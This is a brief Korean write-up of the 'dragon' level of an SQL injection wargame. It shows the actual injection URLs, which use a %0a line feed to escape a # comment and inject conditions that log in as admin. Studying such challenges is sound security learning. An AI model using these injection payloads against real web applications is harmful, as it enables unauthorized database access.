[LOS] dragon

pw에 아무 값이나 넣어보자.

https://los.eagle-jump.org/dragon_7ead3fe768221c5d34bc42d518130972.php?pw=123

pw가 아무런 값이나 들어가 있어도 #으로 인해 뒤에 모든 문자가 주석처리 돼서 Hello guest가 출력이 된다.

우선 주석을 우회해야 한다. #은 한 줄만 주석처리를 하기 때문에 Line Feed(\n)인 %0a로 한 줄을 넘기고 그 다음에 값을 입력하면 된다.

https://los.eagle-jump.org/dragon_7ead3fe768221c5d34bc42d518130972.php?pw=%27%20%0aand%20length(pw)%3C%2720

pw의 길이가 20글자 미만인 경우에는 아무런 값이 안뜨는 것을 보면 정상적으로 주석을 우회했다는 것을 알 수 있다.

https://los.eagle-jump.org/dragon_7ead3fe768221c5d34bc42d518130972.php?pw=%27%20%0aand%20length(pw)=%2720

pw의 길이가 20글자 일때 참이 되어서 Hello guest를 출력할 수 있다.

https://los.eagle-jump.org/dragon_7ead3fe768221c5d34bc42d518130972.php?pw=' or id='admin' and length(pw)>'0

or id='admin' and length(pw)>'0을 입력하게 되면 Hello admin이 뜰 줄 알았는데 안떠서 계속 헤맸다. 

알고보니 앞에 id='guest'라는 값은 이미 참이어서 guest를 출력하게 되는 것이다. 그럼 강제로 pw를 틀린 값을 입력해주면 admin이 나올 것이다.

https://los.eagle-jump.org/dragon_7ead3fe768221c5d34bc42d518130972.php?pw=%27%20%0a and pw='' or%20id=%27admin%27%20and%20length(pw)>%270

다 풀어보고 나니 pw길이를 알아낼 필요는 없었던 문제였다.